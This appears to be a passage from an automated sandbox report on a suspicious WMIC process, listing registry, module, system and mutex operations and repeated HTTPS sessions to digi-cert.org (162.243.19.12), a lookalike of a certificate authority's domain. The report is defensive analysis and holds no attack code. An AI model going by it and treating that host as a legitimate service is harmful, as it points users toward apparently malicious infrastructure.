Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1 Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_EXPAND_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = %systemroot%\system32\netfxperf.dll, type = REG_EXPAND_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 6000, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2 Fn, Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework value_name = LegacyWPADSupport, type = REG_NONE False 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727 value_name = SchUseStrongCrypto, type = REG_NONE False 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (64)
Operation Module Additional Information Success Count Logfile
Load amsi.dll base_address = 0x7ffbf68c0000 True 1 Fn
Load C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\wminet_utils.dll base_address = 0x7ffbf68f0000 True 1 Fn
Get Handle c:\windows\system32\wbem\wmic.exe base_address = 0x7ff66e670000 True 1 Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 1 Fn
Get Handle c:\windows\system32\kernelbase.dll base_address = 0x7ffc14550000 True 1 Fn
Get Filename - process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260 True 3 Fn
Get Address c:\windows\system32\kernel32.dll function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0 True 1 Fn
Get Address c:\windows\system32\amsi.dll function = AmsiInitialize, address_out = 0x7ffbf68c2260 True 1 Fn
Get Address c:\windows\system32\amsi.dll function = AmsiScanString, address_out = 0x7ffbf68c26b0 True 1 Fn
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670 True 1 Fn
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540 True 1 Fn
Get Address Unknown module name function = ResetSecurity, address_out = 0x7ffbf68f20e0 True 1 Fn
Get Address Unknown module name function = SetSecurity, address_out = 0x7ffbf68f21b0 True 1 Fn
Get Address Unknown module name function = BlessIWbemServices, address_out = 0x7ffbf68f2290 True 1 Fn
Get Address Unknown module name function = BlessIWbemServicesObject, address_out = 0x7ffbf68f23b0 True 1 Fn
Get Address Unknown module name function = GetPropertyHandle, address_out = 0x7ffbf68f24d0 True 1 Fn
Get Address Unknown module name function = WritePropertyValue, address_out = 0x7ffbf68f2500 True 1 Fn
Get Address Unknown module name function = Clone, address_out = 0x7ffbf68f2530 True 2 Fn
Get Address Unknown module name function = VerifyClientKey, address_out = 0x7ffbf68f31f0 True 1 Fn
Get Address Unknown module name function = GetQualifierSet, address_out = 0x7ffbf68f2a50 True 1 Fn
Get Address Unknown module name function = Get, address_out = 0x7ffbf68f2700 True 1 Fn
Get Address Unknown module name function = Put, address_out = 0x7ffbf68f26c0 True 1 Fn
Get Address Unknown module name function = Delete, address_out = 0x7ffbf68f2750 True 1 Fn
Get Address Unknown module name function = GetNames, address_out = 0x7ffbf68f2760 True 1 Fn
Get Address Unknown module name function = BeginEnumeration, address_out = 0x7ffbf68f27b0 True 1 Fn
Get Address Unknown module name function = Next, address_out = 0x7ffbf68f27c0 True 1 Fn
Get Address Unknown module name function = EndEnumeration, address_out = 0x7ffbf68f2810 True 1 Fn
Get Address Unknown module name function = GetPropertyQualifierSet, address_out = 0x7ffbf68f2820 True 1 Fn
Get Address Unknown module name function = GetObjectText, address_out = 0x7ffbf68f2840 True 1 Fn
Get Address Unknown module name function = SpawnDerivedClass, address_out = 0x7ffbf68f2860 True 1 Fn
Get Address Unknown module name function = SpawnInstance, address_out = 0x7ffbf68f2880 True 1 Fn
Get Address Unknown module name function = CompareTo, address_out = 0x7ffbf68f28a0 True 1 Fn
Get Address Unknown module name function = GetPropertyOrigin, address_out = 0x7ffbf68f28c0 True 1 Fn
Get Address Unknown module name function = InheritsFrom, address_out = 0x7ffbf68f28e0 True 1 Fn
Get Address Unknown module name function = GetMethod, address_out = 0x7ffbf68f28f0 True 1 Fn
Get Address Unknown module name function = PutMethod, address_out = 0x7ffbf68f2940 True 1 Fn
Get Address Unknown module name function = DeleteMethod, address_out = 0x7ffbf68f2990 True 1 Fn
Get Address Unknown module name function = BeginMethodEnumeration, address_out = 0x7ffbf68f29a0 True 1 Fn
Get Address Unknown module name function = NextMethod, address_out = 0x7ffbf68f29b0 True 1 Fn
Get Address Unknown module name function = EndMethodEnumeration, address_out = 0x7ffbf68f2a00 True 1 Fn
Get Address Unknown module name function = GetMethodQualifierSet, address_out = 0x7ffbf68f2a10 True 1 Fn
Get Address Unknown module name function = GetMethodOrigin, address_out = 0x7ffbf68f2a30 True 1 Fn
Get Address Unknown module name function = QualifierSet_Get, address_out = 0x7ffbf68f2a60 True 1 Fn
Get Address Unknown module name function = QualifierSet_Put, address_out = 0x7ffbf68f2ab0 True 1 Fn
Get Address Unknown module name function = QualifierSet_Delete, address_out = 0x7ffbf68f2ae0 True 1 Fn
Get Address Unknown module name function = QualifierSet_GetNames, address_out = 0x7ffbf68f2af0 True 1 Fn
Get Address Unknown module name function = QualifierSet_BeginEnumeration, address_out = 0x7ffbf68f2b10 True 1 Fn
Get Address Unknown module name function = QualifierSet_Next, address_out = 0x7ffbf68f2b20 True 1 Fn
Get Address Unknown module name function = QualifierSet_EndEnumeration, address_out = 0x7ffbf68f2b70 True 1 Fn
Get Address Unknown module name function = GetCurrentApartmentType, address_out = 0x7ffbf68f2a50 True 1 Fn
Get Address Unknown module name function = GetDemultiplexedStub, address_out = 0x7ffbf68f2060 True 1 Fn
Get Address Unknown module name function = CreateInstanceEnumWmi, address_out = 0x7ffbf68f1760 True 1 Fn
Get Address Unknown module name function = CreateClassEnumWmi, address_out = 0x7ffbf68f18c0 True 1 Fn
Get Address Unknown module name function = ExecQueryWmi, address_out = 0x7ffbf68f1a20 True 1 Fn
Get Address Unknown module name function = ExecNotificationQueryWmi, address_out = 0x7ffbf68f1b90 True 1 Fn
Get Address Unknown module name function = PutInstanceWmi, address_out = 0x7ffbf68f1d00 True 1 Fn
Get Address Unknown module name function = PutClassWmi, address_out = 0x7ffbf68f1e00 True 1 Fn
Get Address Unknown module name function = CloneEnumWbemClassObject, address_out = 0x7ffbf68f1f00 True 1 Fn
Get Address Unknown module name function = ConnectServerWmi, address_out = 0x7ffbf68f34c0 True 1 Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1 Fn
Map - process_name = c:\windows\system32\wbem\wmic.exe, desired_access = FILE_MAP_WRITE True 1 Fn
User (1)
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1 Fn
System (53)
Operation Additional Information Success Count Logfile
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 3 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 3 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 3 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 2 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 1 Fn
Get Computer Name result_out = X2VS1CUM True 3 Fn
Get Time type = Local Time, time = 2018-06-26 22:59:05 (Local Time) True 1 Fn
Get Time type = Ticks, time = 133156 True 1 Fn
Get Time type = Ticks, time = 140265 True 1 Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1 Fn
Get Info type = Operating System True 1 Fn
Get Info type = Operating System True 7 Fn
Get Info type = Hardware Information True 1 Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1 Fn
Mutex (23)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10 Fn
Create mutex_name = Global\.net clr networking False 1 Fn
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1 Fn
Release mutex_name = Global\.net clr networking True 1 Fn
Release mutex_name = Global\.net clr networking True 10 Fn
Environment (118)
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 112 Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1 Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1 Fn
Get Environment String name = HOMEPATH, result_out = \Users\Nd9E1FYi True 1 Fn
Get Environment String name = HomeDrive, result_out = C: True 1 Fn
Get Environment String name = HomePath, result_out = \Users\Nd9E1FYi True 1 Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1 Fn
Network Behavior
DNS (5)
Operation Additional Information Success Count Logfile
Resolve Name host = digi-cert.org, address_out = 162.243.19.12 True 5 Fn
TCP Sessions (18)
Information Value
Total Data Sent 6.19 KB
Total Data Received 30.38 KB
Contacted Host Count 1
Contacted Hosts 162.243.19.12:443
TCP Session #1
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 680 bytes
Data Received 3.68 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 61, size_out = 61 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1575, size_out = 1575 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 331, size_out = 331 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 4, size_out = 4 True 1 Fn, Data
Send flags = NO_FLAG_SET, size = 134, size_out = 134 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 218, size_out = 218 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size = 213, size_out = 213 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #2
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #3
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #4
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #5
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #6
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #7
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #8
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.60 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 272, size_out = 272 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
